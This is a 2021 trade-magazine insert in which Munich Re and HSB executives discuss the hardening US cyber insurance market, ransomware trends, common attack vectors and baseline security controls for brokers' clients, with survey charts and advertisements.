EXECUTIVE INSIGHTS SERIES
CYBER MARKET UPDATE How to navigate the firming cyber landscape to find the best options for your clients 00_Insert OFC IFC IBC OBC-SUBBED.indd 1
22/10/2021 2:05:39 am
Your partner for cyber Admitted, A++ rated solutions from an industry leader offer strength and stability when it’s needed most.
Munich Re Regular 16pt
Learn more at HSB.com
2021-369-C-Insurance Business AD FINAL.indd 1 00_Insert OFC IFC IBC OBC-SUBBED.indd 2
© 2021 The Hartford Steam Boiler Inspection and Insurance Company. All rights reserved.
10/15/21 10:50 AM 22/10/2021 2:05:44 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE
CYBER MARKET UPDATE As the year draws to a close, Insurance Business America checks in with executives at Munich Re and HSB to find out how the cyber market has evolved and what brokers should be prepared for heading into 2022
THE WORLD has entered uncharted territory. As businesses and individuals realize the true potential of global digital connectedness, they’re also facing the ever-growing threat of cybercrime and cybersecurity failures. As the old proverb goes, every rose has its thorn – and in the case of digitalization, the thorn of cyber risk only seems to be growing longer, sharper and far more dangerous. As such, it’s critically important for risk owners to learn from past incidents and stay on top of cybersecurity trends, threats and vulnerabilities. The dollars potentially at risk if businesses fail to gain some control over their cyber exposures are significant. According to estimates by global researcher Cyber Ventures, cybercrime damage will reach $10.5 trillion by 2025. But there’s a long way to go. The results of Munich Re’s first Global Cyber Risk and Insurance Survey, published in March 2021, show that 81% of C-suite respondents think their company is not adequately protected against cyber threats. By far the most prominent threat in the cyber space at the moment is ransom-
ware. This variation of malware allows hackers to lock businesses or individuals out of their systems until they pay a ransom, usually in cryptocurrency. In the past year, there has been a significant uptick in the frequency and severity of ransomware attacks, impacting businesses of all sizes and in all sectors. There are several factors driving the surge in ransomware incidents, including the emergence of ransomware as a service, whereby criminals can purchase ready-made and relatively cheap malware on the dark web, which they can then use against victims with either a ‘spray and pray’ or more targeted approach. Some hackers are also using more sophisticated strategies, such as double and triple extortion campaigns, to ensure their ransomware attacks generate as much financial gain as possible. Unfortunately, the hackers have seen success. In 2021, there have been multiple high-profile ransomware attacks, especially targeting companies with global supply chains or critical infrastructure (such as the Colonial Pipeline attack), or software/IT services providers (such as
SolarWinds) that can be manipulated to spread the malware. These ransomware events – and the countless other cyber incidents, from data breaches to business email compromise, that trigger business downtime, extortion demands and other financial losses – highlight the importance of effective cyber risk management and the need for adequate cyber insurance protection. The latter part of that equation is only becoming more challenging for companies as the cyber insurance market tightens up in response to a surge in losses. With all of this in mind, IBA reached out to five cyber insurance experts to explore the key themes and questions in the sector, from best practices for risk mitigation to up-and-coming cyber threats for businesses of all sizes and industries. Through their insights, we hope to provide brokers and agents with an enhanced understanding of the current state of the cyber insurance market. Bethan Moorcraft Senior editor Insurance Business America
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 1
1
22/10/2021 2:06:33 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE
MARKET OVERVIEW How would you describe the state of the US cyber insurance market heading into the fourth quarter of 2021? Laurie Schwarz: Increase in ransomware losses, restriction of terms and conditions, increase in premium, and a lack of market capacity continue heading into the end of 2021. [This year] is on track to have a greater number of ransomware victims and losses than the prior year. As insurers and reinsurers calculate the performance and profitability of their cyber portfolios – or lack thereof – this will drive current underwriting strategies, further limitation of coverage and premium increases. Given the unexpected
premium increases of 50% to 200%+ in 2021, insurers find themselves far exceeding their 2021 premium budgets, forcing some to cut back on writing new business. One of the biggest changes in 2021 that will continue is insurers requiring baseline information security controls in order to entertain insuring an applicant’s cyber risk. Even if an applicant can demonstrate a baseline of information security controls, some insurers will go one step further and score the applicant’s controls, impacting the amount and cost of their insurance. The ‘x factor’ heading into 2022 is, for those insurers purchasing reinsur-
ance, how their reinsurance renewal will impact their pricing, appetite, and terms and conditions for cyber. It’s anticipated the market correction will continue in 2022; the question is how dramatic it will be in comparison to 2021. Annamaria Landaverde: Over the last two years, the cyber insurance market has experienced more significant and more frequent losses than anticipated. In response, insurers are adjusting rates to account for those losses, taking broad corrective measures such as restricting appetite and requiring minimum basic cybersecurity controls, investing in underwriting and portfolio management tools, and greater management of expo-
MEET THE EXPERTS Monique Ferraro Cyber counsel HSB Monique Ferraro provides legal and technical expertise in support of HSB’s global cyber products. Her cybersecurity and privacy experience spans more than 25 years in digital forensics, e-discovery, information security and privacy. Ferraro holds several designations, including Certified Information Systems Security Professional (CISSP), Fellow of Information Privacy, Certified Information Privacy Professional/US (CIPP/US), Certified Information Privacy Manager (CIPM) and Chartered Property Casualty Underwriter (CPCU).
2
Annamaria Landaverde SVP, cyber practice lead Munich Reinsurance America
Annamaria Landaverde joined Munich Re in September 2017 and is responsible for the profit and growth of the cyber reinsurance portfolio and US team. She is also an active member of the Munich Re Cyber Global Line of Business Board. Prior to joining Munich Re, Landaverde served as cyber practice leader for a multiline MGA and a global insurer. Earlier in her career, she was a professional liability team lead and national accounts underwriter.
Paul Needle SVP, cyber treaty underwriter Munich Reinsurance America Paul Needle began his insurance career as a managing general underwriter before serving as a professional lines underwriter. Prior to joining Munich Re in April 2021, he spent eight years at CNA Insurance, most recently as the financial institution cyber product lead. Needle holds a Certified Information System Auditor (CISA) designation.
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 2
22/10/2021 2:06:38 am
sure to potential catastrophic events via limits and sublimits. In Q4 2021, the industry will continue to see all these actions in play, as well as deeper analysis of loss trends and overall performance results. These will be used to evaluate how and if the correc-
tive measures of the previous two years materialized into quantifiable portfolio improvement. Rethinking cyber insurance wording will also be top of mind as we enter 2022 in a collective effort to manage catastrophic exposures, such as supply chain risk, cyber war and
“The hardening cyber insurance market has been extremely challenging for cyber brokers. Now they are working in a chasm between market confusion and customers living in the past” Laurie Schwarz
Robert Parisi Head of cyber solutions – North America Munich Re Facultative & Corporate Before joining Munich Re, Robert Parisi served as managing director and cyber leader at Marsh. Prior to that, he spent seven years at AIG, where he held several executive and legal positions and developed cyber insurance and specialty reinsurance to address aggregation-of-risk issues inherent in cyber insurance. Before AIG, he was in private practice as legal counsel to Lloyd’s of London.
Laurie Schwarz Vice president Munich Re Specialty Insurance
Laurie Schwarz has spent more than 36 years in the insurance market, specializing in errors & omissions, cyber and professional liability coverages as both an underwriter and broker. She joined Munich Re in April 2020 to help create and launch its Cyber and Cyber and Tech insurance products. Prior to that, she helped develop an underwriting technology platform at Symantec and also leveraged technology, data and analytics to create a cyber insurtech startup.
nation-state attacks. As evident in the earlier part of 2021, cyber insurers will continue to have the opportunity in Q4 to offer proactive loss mitigation services. Service offering uptake by policyholders is at an all-time high, reflecting that organizations of all sizes are not just seeking capacity from cyber insurers, but are looking for partners that can help identify and remediate cybersecurity issues, provide security awareness trainings, and facilitate engagements with experienced cybersecurity, incident response, and legal experts. Robert Parisi: Large corporate buyers continue to face a hardening market. Driven in large part by an increasing frequency and severity of ransomware losses, insurers have actively sought to limit their exposure to risks, representing potential aggregation through narrowing coverage, reducing capacity and/or pushing attachment points higher. The market has also seen the departure of several insurers from the space. Insurers have approached the problem of potential accumulation and aggregation risk across a spectrum, from laser-focused exclusions on ransomware to broader exclusions seeking to address the larger accumulation risk. At the same time, insurers have raised rates, with the market seeing price increases accelerating. However, the opportunity for buyers to procure fit-for-purpose cyber coverage remains, albeit in a more challenging environment. Buyers are now facing increased scrutiny around those risks tied to potential aggregation or accumulation, in addition to more questions concerning ransomware and operational technology. Insurers continue to value an applicant that can demonstrate not just security but resilience.
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 3
3
22/10/2021 2:06:41 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE
How does the hardening market impact insurance brokers? What must they do to navigate this market successfully and secure the best solutions for their clients? Robert Parisi: Brokers have had to begin the process of organizing cyber submissions much earlier and have been forced to cast a wider net within their clients’ organizations to gather the data needed to respond to the expanding inquiry of insurers. Gone are the days of a few years ago, when a broker could procure coverage with a boilerplate application and a quick 30-minute phone call
4
with the client’s chief information security officer. Generally speaking, brokers are advising clients that, in addition to breadth of information, the ability to provide a greater level of transparency into their information and technology governance is key to distinguishing that applicant in the eyes of the insurer. Laurie Schwarz: The hardening cyber insurance market has been extremely challenging for cyber brokers. Now they are working in a chasm between market confusion and customers living in the past. Brokers are getting pushback from both sides.
Brokers’ internal and/or external customers are having a harder time processing their 2021 cyber renewals. Being advised multiple times about how the cyber insurance market is hardening, many have found it hard to understand what it will mean for their cyber renewal quote. For those insureds that have not had a ransomware loss or have not had a loss paid exceeding their deductible, brokers are having difficulty explaining the significant changes in renewal terms – deductibles and premiums increasing in multiples, limits being reduced, and some coverages being restricted with
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 4
22/10/2021 2:06:48 am
CYBER INSURANCE: LOW PENETRATION, HIGH POTENTIAL
35% of business leaders are considering taking out a cyber insurance policy for their company and will most likely do so
81% of C-level executives said they feel inadequately protected against cybercrime
25% of C-level respondents were totally unaware of the opportunities that holistic cyber solutions offer
34% of C-level respondents have been in contact with their insurers
17% of C-level respondents still do not have an overview of the cyber insurance products and services on the market Source: Munich Re Global Cyber Risk and Insurance Survey, 2021
co-insurance or no longer provided – compared to their experience in prior years. It’s not a comfortable conversation. Insurers are now pushing back on insureds, requiring them to have a minimal level of information security controls to qualify for coverage. This is a first. In prior years, simply working toward making various changes and improvements was enough. However, insurers, via their losses, are recognizing this is no longer enough. There’s hope that market predictability will improve for 2022, and with the experience of 2021, brokers’ messaging
targeted or sophisticated. Getting around the encryption was fairly trivial, and the ransom demands were pretty small in comparison to the large ones we are seeing today. For example, ransoms used to average a couple hundred to around a thousand dollars on average. We now see ransom demands of millions of dollars and attacks that are both sophisticated and layered. By sophisticated, I mean that the attackers are organized, even to the point that they have ‘customer service’ operations to assist victims in unencrypting their systems. They research their targets
“Social engineering has been a pernicious problem. As the market learns of a new hacker approach, the hackers change their tactics” Monique Ferraro to their internal and external customers will be less likely to be debated or denied. Insureds will have their 2021 renewal experience as a baseline conversation.
Ransomware is arguably the hottest topic in cyber insurance today. How have you seen the ransomware threat evolve in recent years? Robert Parisi: Ransomware has evolved tremendously since it first appeared nearly 40 years ago via floppy drive. Most recently, ransomware has increased not just in severity, as measured by the increased extortion demand, but also in frequency and breadth. In addition, the underlying malware elements of ransomware have also evolved and increased as the non-extortion damage caused by ransomware has expanded. Monique Ferraro: Ransomware distribution five or six years ago was a low-level concern. It was mostly an annoyance that was not particularly
ahead of time, and they exercise discipline during the attack, which is increasingly multifaceted. The multifaceted attacks have distinct characteristics, but the thing they have in common is that there is more than one part of the attack. Victims often refuse to pay the ransom if they believe the attackers will come back or that there will be another stage of extortion. Some victims simply refuse to pay on principle. Still others have upped their security profiles, made sure they have working backups and provide their employees with regular cyber safety training. Those things have had a big impact.
What are the most common cybersecurity attack vectors and breach methods? Robert Parisi: According to InfoSec firms, the leading cause of cyber breaches and incidents remains social engineering, specifically phishing as a prelude to ransomware. With regard to more sophis-
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 5
5
22/10/2021 2:06:50 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE ticated attacks, nation-state attacks – malicious cyberattacks that originate from a particular country to further that country’s interests – while less common, remain the costliest. Monique Ferraro: The most common attack vectors change over time, largely as a result of a cat-and-mouse game between hackers and their targets. Right now, remote desktop protocol [RDP], poorly configured cloud storage, brute force and social engineering are at the top of the list. RDP has been a particularly troublesome vector during the pandemic, especially in the beginning of quarantine when businesses moved quickly to set up remote work and did not always properly configure their RDP. There is also a brisk online market for stolen RDP credentials that facilitate hacking. Poorly configured cloud storage has also proven to be vulnerable. Businesses flocked to the cloud to reduce operating costs and ensure that data is secure and available, but the accounts must be properly configured to provide adequate protection. Brute force attacks, when a hacker attempts to guess a user’s login, are still prevalent but less successful due to the adoption of password policies. Finally, social engineering has been a pernicious problem. As the market learns of a new hacker approach, the hackers change their tactics. For example, one week the primary social engineering approach will be phishing emails sent to payroll clerks, requesting the company W-2s for some important purpose. The next week, hackers may move on to approaching employees directly and offering to share part of the ransom if the attack is successful in return for their login credentials.
How has the COVID-19 pandemic impacted the cyber risk landscape? Robert Parisi: The story of the COVID-19 pandemic remains to be
6
written, and the confluence of increased ransomware due to a mass migration to remote work makes it difficult to separate which had the greater impact on risk and losses. The pandemic certainly saw many organizations unprepared to deal with enabling a remote workforce.
coverage is available in various formats: embedded in traditional lines policies, such as BOPs; an endorsed or separate insuring agreement in financial lines policies, such as crime; or stand-alone cyber policies. While cyber enhancements to noncyber policies provide varying degrees of The pandemic has increased coverage, only a stand-alone cyber policy people’s personal reliance on can provide the full breadth of first- and technology. There are some third-party coverage to address an orgaelements of cyber coverage nization’s holistic cyber risk management on homeowner’s and crime needs. Also included in stand-alone polipolicies and on credit cards. cies are post-incident response services, What are the benefits of buying 24/7 access to breach counselors and, a stand-alone cyber policy? in many cases, contingent business Annamaria Landaverde: Personal interruption coverage stemming from a lines cyber insurance is available as a service provider outage, to name a few. coverage extension in homeowner’s poliMore and more cyber insurers now also cies. Coverage offered includes identity offer employee awareness training and theft restoration and consultation, cyber- real-time risk mitigation services, notibullying loss, and relocation expenses. fying organizations of a potential network For commercial lines, affirmative cyber vulnerability before it gets exploited.
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 6
22/10/2021 2:06:56 am
SMALL COMMERCIAL What attack vectors are cybercriminals using to target small businesses? Laurie Schwarz: Cyber insurers are now requiring their small business clients to have a baseline level of information security controls. It starts with protecting the perimeter. Phishing events, business email compromise and unsecured open ports – including remote desktop ports – without compensating controls on publicly facing servers are common tactics used by threat actors to gain access to a company’s IT environment. Insurers will look for companies providing phishing training during employee onboarding and ongoing training – preferably, companies lever-
aging phishing simulation technology where they can demonstrate a less than 5% click-through failure rate. Insurers will also look for companies to deploy endpoint protection/detection technology [EPP/EDR], ideally with behavioral analysis capability. It’s critical to have EPP/EDR deployed on all endpoints, as well as having the sensors installed correctly. In the event there are alerts provided by the EPP/EDR technology, having 24/7/365 monitoring is important, as threat actors are known to strike on weekends/holiday weekends. Another key control is addressing administrative controls. Dual factor/ multifactor authentication for accessing the network and critical data is a must.
Limit the number of individuals who have administrator credentials, and for those who are network administrators, have separate credentials for the administrator account. In the event a threat actor gains access to the network environment and moves around the network and obtains administrative privileges, it’s imperative to have backups of critical data, workstations and servers in an offline/off-site/in-the-cloud disconnected from the network environment, requiring separate credentials to access the backups and preferably stored in an immutable fashion. The idea is to have backups the threat actor cannot encrypt, delete and/or corrupt. Having baseline controls aims
FOUR STEPS TO BETTER CYBERSECURITY According to HSB’s Monique Ferraro, sticking with the fundamentals is key to small business cybersecurity. She shares four ways businesses can prevent and mitigate damage if an attack occurs.
what kind of data you have 1 Know and where it’s located
Tracking down data is much harder during or after a cyberattack than it is beforehand. Knowing what data you have – especially financial, business confidential, personal or health information – will give you the data you need ahead of a potential attack in order to determine your response.
multiple backups that you 2 Have test regularly
It isn’t enough to just back up your data to the cloud. Sufficient backups consist of at least the cloud, as well as ‘air-gapped’ backups – backups that are not connected to the internet and are stored off-site to maximize utility in the event of a disaster.
that email security, such as 3 Ensure DMARC, is implemented
DMARC is a technology that checks that an email actually came from the domain that it says it came from. DMARC is deployed by your email provider, but depending on the size and sophistication of your operation, it may be controlled by your IT department. Checking to ensure that you have at least DMARC in place will greatly reduce spam and phishing attempts so that your other controls can be more effective.
regular cybersecurity 4 Provide awareness and security training
We are all aware of phishing attempts, but hackers are always honing their craft and changing up their approach. Regular cybersecurity awareness training, sending out reminders, posting posters and conducting phish tests of your employees all help to keep cybersecurity fresh in employees’ minds. Rewarding cyber hygiene practices, rather than punishing transgressions, goes a long way to ensuring that employees are not the weakest link in the attack chain.
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 7
7
22/10/2021 2:06:59 am
In turbulent waters, our cyber solutions will propel you forward.
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 8
22/10/2021 2:07:05 am
This is uncharted territory. With all that the digital future promises, the threat of cybercrime can make it feel like you are charging forward without a guide. But you’re not. We offer the products and services businesses need to sidestep risks, nimbly respond when breaches occur, and get back on track after time and money are lost to cybercrime. With Munich Re by your side, you can advance the digital future with confidence. For more information visit munichre.com/cyber Munich Reinsurance America, Inc. All rights reserved.
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 9
22/10/2021 2:07:10 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE to limit entry into the IT environment, lateral movement within the IT environment, and encrypting and/or deleting data/backups. Paul Needle: In addition, attackers are using a method known as ‘living off the land.’ Adversaries are utilizing tools currently deployed by the victim to execute their attack. Examples include PowerShell and Cobalt Strike to quickly propagate malware and evade detection.
LARGE FINANCIAL AND CORPORATE ENTITIES
“A third of small and mid-sized companies do not have cyber insurance because they do not want it or realize they need it. A quarter said it was because it is too expensive” Monique Ferraro What factors influence the cyber insurance buying decisions for small businesses? Monique Ferraro: According to the
Large financial and corporate entities have long been targets of cybercriminals. Are any sectors or types of business more exposed than others, and if so, why? Robert Parisi: The nature of tech-
most recent HSB/Zogby Analytics survey, American Business Cyber Security Habits & Landscape – A 2021 Survey of Business Decision Makers in SMBs, a third of small and mid-sized companies do not have cyber insurance because they do not want it or realize they need it. A quarter of respondents said it was because it is too expensive. Those who find cyber insurance too complicated, confusing and/or too difficult to obtain add up to approximately a quarter as well.
nology is such that attackers can cast a wide net with little or no additional expense. At the same time, the easy availability of malware, which can now be literally licensed for use, enables a broader universe of criminals to expand their activities with relative ease. However, 2020 did see some trends with healthcare, government, financial institutions, retail, education and technology being the most targeted sectors of the economy, respectively. One
10
growing trend in 2020 and 2021 was the increasing attacks associated with operational technology [OT]. As such, organizations with heavy reliance or use of OT have seen the greatest acceleration in attempted exploits. Laurie Schwarz: Manufacturing and critical infrastructure are examples of industry verticals where information technology and operational technology exist, and they face greater cyber exposure than services-based entities. What is OT? According to the NIST, OT consists of programmable systems or devices that interact with the physical environment or manage devices that interact with the physical environment. These systems/devices detect or cause
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 10
22/10/2021 2:07:13 am
CYBERSECURITY IN PRIVATE LIFE ARE BUSINESS LEADERS BEING OFFERED CYBER INSURANCE FOR THEIR PRIVATE LIFE?
13%
Yes No
87%
Source: Munich Re Global Cyber Risk and Insurance Survey, 2021
a direct change through the monitoring and/or control of devices, processes, and events. Examples include industrial
and critical infrastructure are updating and hardening OT assets and the integration of IT and OT assets. Updating and hardening OT assets includes many of the same areas as IT assets, such as patching
“Whereas just a few years ago, a broker could easily find $500 million in capacity for a client, now even loss-free renewals for corporate placements are struggling to renew existing limits” Robert Parisi control systems, building management systems, fire control systems and physical access control mechanisms. Two key challenges for manufacturers
of software and firmware, secure configuration, user and account access limitation, ensuring network connectivity security, removal of unnecessary software,
and ensuring proper backups. The execution of how these items are addressed is very different. For example, patching can be challenging and often requires compensating controls to address beyond patching. OT assets were not designed to be connected to the internet and are typically kept offline, segregated from the corporate IT environment. In addition, OT assets are protected by plant engineers, outside of the corporate IT system administrators. With OT and IT being connected and exposed to the internet, OT assets’ vulnerabilities are accessible to threat actors. Industry verticals where the company’s operations rely on operational technology obviously have greater cyber exposures than services-based entities. Paul Needle: I would equate expo-
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 11
11
22/10/2021 2:07:17 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE
THE IMPORTANCE OF PRE-INCIDENT SERVICES WHICH OF THESE SERVICES SHOULD BE COVERED BY CYBER INSURANCE SOLUTIONS? 70%
C-level executives
All business leaders
60% 50% 40% 30% 20% 10% 0%
Network security (e.g. firewall)
Backup of critical systems and data
Anti-malware tools
Identity and access (e.g. password management)
IT security consulting
Employee security awareness measures
Patch management (testing and installation of required updates)
Endpoint protection
Mobile device management
Source: Munich Re Global Cyber Risk and Insurance Survey, 2021
sure to risk. Risk can be defined as the product of impact and probability. To understand industries that are at greater risk, you must consider probability and impact. Financial institutions are reportedly targeted more than any other industry. Certainly, the inherent cyber risk of a financial institution is high. However, when you consider the cyber maturity level of a large financial institution, the residual risk is reduced by limiting probability of an occurrence. The financial impact of a successful attack on a financial institution is going to be much larger. It then becomes a risk tolerance question, along with the level of assurance, when underwriting a large financial institution. Another industry to consider would be manufacturing, which can be reliant on technology. Manufacturers have
12
minimized exposure in terms of personally identifiable information [PII], but if the availability of their technology is gone, operations can come to a standstill. Some manufacturing sectors have a large and complicated attack surface from numerous devices, the Internet of Things [IoT] and custom machines. From an operational technology perspective, many organizations require remote connectivity in some form. With interconnected networks and complicated machinery, vulnerabilities become difficult to manage. The high probability of exploiting a vulnerability, combined with a large impact, implies some manufacturing operations could be higher-risk. The same exposures are found in healthcare, except impact is exponentially increased due to the confidentiality of information, the need for data integrity and the availability of technology. A
loss of any could mean the loss of life. Other sectors that have realized large losses, specifically in ransomware, are education and municipalities. With fewer resources to identify and mitigate the probability of an attack, along with the potential for considerable impact, education and municipalities have been a target of ransomware. Managing risk becomes even more complicated if the company is large and/or public.
How has the hardening cyber insurance market impacted corporate entities? Robert Parisi: The most obvious impact of the hardening market on corporate entities has been the availability of capacity for large cyber insurance towers. Whereas just a few years ago, a broker could easily find $500 million in capacity for a client, now even loss-free renewals
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 12
22/10/2021 2:07:20 am
for corporate placements are struggling to renew existing limits – and where renewal occurs, it is typically within increased retention and premium of anywhere from 50% to 200% over prior year’s pricing. This is at a time when organizations are recognizing that technology-related risks represent the largest potential source of disruption to their operations. Paul Needle: There are many ways the hardening market has impacted them. Capacity has been reduced. Premiums have increased. Many insurers are reducing $10 million limits. Some insureds are utilizing co-insurance and reduction of sublimits so that aggregate limits goals can still be achieved. Often, insureds are either forced to or choose to take on a higher deductible. Additionally, some carriers are carving out systemic risk with the option to purchase it back, similar to flood or earthquake in a property policy. Insurance carriers are adjusting several components, specifically underwriting scrutiny regarding controls, which should have immediate effects on losses and contribute toward a stabilized marketplace. All of this has contributed to difficult renewals for insureds. Certainly, the changes are necessary to ensure long-term sustainability of the cyber liability product.
Cyber has reached the board level. Why is it important for corporate entities to bring their CISO to the board and to educate management around cyber risks? Robert Parisi: Technology-related risks represent the largest potential source of disruption to their operations. They need to be treated for what they are: operational risk. According to the 2021 Munich Re Global Cyber Risk and Insurance Survey, most business leaders are concerned about cyber risks, yet too many are unaware of the holistic solutions available to secure them from risks and losses.
EMERGING RISKS
Ransomware has topped the list of cyber insurance concerns for the past two years. How do you expect that risk to evolve, and what will ransomware look like in the future? Laurie Schwarz: The highest-ranking cybersecurity officials in the US government believe ransomware is a national security threat that is here to stay. Personal information data breaches and the monetization of this data have
lost their appeal and economic benefit; they’re so ‘last decade.’ The development and expansion of ransomware as a service is one of the primary reasons why ransomware has increased in scale and scope. Whether it’s spray-and-pray or targeted attacks, ransomware attacks are not slowing down while becoming more sophisticated. Companies in the supply chain that can have exponential aggregate impact are attractive targets. The SolarWinds
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 13
13
22/10/2021 2:07:26 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE
HIGH DEMAND FOR POST-INCIDENT SERVICES WHICH OF THESE SERVICES SHOULD BE COVERED BY CYBER INSURANCE SOLUTIONS IN CASE OF CYBERATTACKS?
70%
C-level executives
All business leaders
60% 50% 40% 30% 20% 10% 0%
Restoration of data from backups
24-hour help hotline
Forensic services after an incident
Legal advice
Consulting in case of extortion
Restoration of reputation
Source: Munich Re Global Cyber Risk and Insurance Survey, 2021
attack is a prime example. Kaseya’s attack is another example. The attack on Kaseya had an impact on many of their customers and then ultimately impacting Kaseya’s customers’ customers – hundreds to thousands of companies. It’s the multiplicative effect, and it’s driving up the price of the ransom demand. Hospitals and healthcare entities became the ‘flavor of the month’ during critical peak periods of the pandemic. Critical infrastructure is up next. Whether it’s the Colonial Pipeline or JBS Foods, industry verticals once viewed as unlikely are now being attacked. As ransomware continues to grow in sophistication, perhaps with involvement from nation-state actors, it’s growing from a corporate nuisance to a national security issue. Under the current administration, there’s likely to be more involvement on a national level, and with that, there will be growing demand for companies to report and work with law enforcement and the
14
“As ransomware continues to grow in sophistication, perhaps with involvement from nation-state actors, it’s growing from a corporate nuisance to a national security issue” Laurie Schwarz FBI. Sadly, ransomware isn’t going away anytime soon. Annamaria Landaverde: While ransomware has been around for some time, it garnered significant attention during the WannaCry and NotPetya incidents of 2017. Since then, the various motivations and actors involved in ransomware threats have evolved. Actors range from individual cybercriminals to ransomware gangs to nation states, while motivations could vary from financial, espionage and disruption to ideological or political in nature. In recent
years, ransomware has become a more frequent and severe threat, with ransom demands gradually increasing from a value that can elude law enforcement to present-day demands reaching millions. When we examine the impact that ransomware threats have had on the cyber insurance market, the increase in frequency and severity is notable. Some continue to view the exposure as strictly a cyber extortion coverage problem; however, it has evolved into much more in recent years. Cyber insurers are paying ransomware losses under multiple
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 14
22/10/2021 2:07:30 am
“There is no shortage of creativity when extorting a company. Companies need to focus on increasing cyber maturity and building a Defense in Depth model” Paul Needle insuring agreements, including digital forensics and incident response, cyber extortion, business interruption, and data breach response – yes, data breach! In addition to ransom demands, actors may access and exfiltrate confidential data in advance of making the demand, which may require the affected company to comply with the various regulatory
and privacy requirements that apply to its business. These costs may include notification and credit monitoring for affected individuals, legal expense, crisis management experts, and the possibility of liability and defense stemming from a third-party demand, as well as regulatory fines and penalties. Paul Needle: Ransomware is still
very much in the growth stage, with the ransomware supply chain developing in maturity much like any other product life cycle. When ransomware first became an issue, the malware was executed from beginning to end by one variant. Now there is increasing diversification of expertise throughout the ransomware process. There are specialized developers that create and sell the malware. Others sell services providing the initial access to an organization. Credentials to escalate privileges can be purchased in coordination with executing a ransomware attack. Some organizations manage a whole group of services representing a syndicate of threat actors. Entire ransomware kits, also known as ransomware as a service [RaaS], are available for purchase. The
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 15
15
22/10/2021 2:07:39 am
EXECUTIVE INSIGHTS SERIES
CYBER INSURANCE specialization in each service has quickly increased expertise and success rates. We can expect further development of these specialized skills and offerings available to threat actors looking to conduct ransomware attacks. Another recent focus has been on data exfiltration. This draws a lot less attention from the US government but can be equally devastating, depending on the data that’s been stolen. There is no shortage of creativity when extorting a company. Companies need to focus on increasing cyber maturity and building a Defense in Depth model. Many insurance carriers provide services that companies can utilize in defending against active tactics, techniques and procedures.
What other risks are causing concerns for cyber underwriters? Paul Needle: Accumulation and systemic risk are concerns for cyber liability underwriters. Underwriters are allocating resources to investigate and identify critical relationships within organizations and technologies. Specifically, these underwriters are focusing on identifying the potential impact of cascading failures within various supply chains and single points of failure. Companies are looking to address the risk of a widespread attack, such as a supply chain attack that would affect multiple insureds at once. Insurance carriers have made valuable progress in identifying this risk, along with the help of insurtechs. Laurie Schwarz: Underwriters are experiencing a gap between perception and reality when it comes to business interruption losses. Business interruption losses have been growing and now represent a significant amount of cyber loss costs incurred by insurers, whether the business interruption loss was sustained from ransomware or expanded coverage triggers in a soft market – e.g. human
16
error or system failure, whether by the insured or a third-party information technology vendor the insured relies upon. Prior to the explosion of ransomware losses, insurers effectively asked if the insured had a business continuity/ disaster recovery plan. Is it in writing? Does it address cyber? What are the insured’s recovery time objectives? This is a start, but it provides no real insight about what a cyber business interruption loss will look like in terms of cost and the drivers of the loss, be it loss of gross profit and/or the expense incurred for data restoration.
that impacts their return to being fully operational. Annamaria Landaverde: While ransomware continues to be the hot topic for the cybersecurity and cyber insurance markets, as Laurie mentioned, 2021 saw several other significant cyberattacks with potential for widespread economic impact, such as SolarWinds, Accellion, Colonial Pipeline, JBS and Kaseya. Underwriters, as well as the government and cybersecurity sectors, are concerned about these incidents for various reasons. Concerns range from supply chain risk to the systemic impact
“As technology becomes more interconnected and businesses continue to expand their supply chain reliance, the risks become more systemic in nature and less controllable from an underwriting perspective” Annamaria Landaverde Now insurers are digging into backup and recovery processes. How are the backups isolated and protected? Insurers are asking better questions; however, they are now experiencing cyber business interruption losses and seeing how the recovery and restoration can take days or weeks, not hours as anticipated. Insurers have paid significant losses even when on paper, the insured seems to have best-in-class processes/controls. Looking forward, it’s reasonable to anticipate insurers digging deeper, learning from their prior losses. Underwriters will seek to have a multidimensional conversation with their insureds to gain a more detailed understanding of the insured’s IT environment – e.g. type and number of IT assets, where and who is responsible for these assets, and how
from a cloud or cloud-based software virus/outage to the economic loss stemming from a failure of critical infrastructure. Not only can these risks result in widespread financial loss, there is also potential for loss to life or property. As technology becomes more interconnected and businesses continue to expand their supply chain reliance, the risks become more systemic in nature and less controllable from an underwriting perspective. Since cyber underwriters must focus on which exposures are measurable and insurable, to address these risks, they will be and have been enhancing guidelines, risk qualification requirements, and policy wording. This progress can result in a more mature and sustainable cyber insurance market for the long term.
www.ibamag.com
01-16_Executive Insight_Cyber Update 2021-SUBBED.indd 16
22/10/2021 2:07:46 am
BROUGHT TO YOU BY AN AWARD-WINNING PUBLISHING COMPANY DIGITAL
PRINT Q4 NOVEMBER 2019 | LEXPERT.CA | $16.95
THE BUSINESS QUARTERLY FOR LAWYERS
WWW.CANADIANLAWYERMAG.COM ISSUE 43.10 | $11.95
RISING STARS
?
THE END OF AN
LEADING LAWYERS UNDER 40
The customs of the legal profession are feeling the weight of 21st-century stresses
PM#41261516
READERS’ CHOICE AWARDS
Companies and products that prevailed among their competitors
CROSS EXAMINED
KEEP BLOGGING
Kirsten Thompson on going from technical to creative in advising on data strategies
Times have changed and blogs must change with them, writes Steve Szentesi PM# 41261516
01_Cover-SUBBED3.indd 2
29/10/2019 3:17:55 AM
EVENTS WOMEN IN INSURANCE AWARDS
IAN TRAL AUS
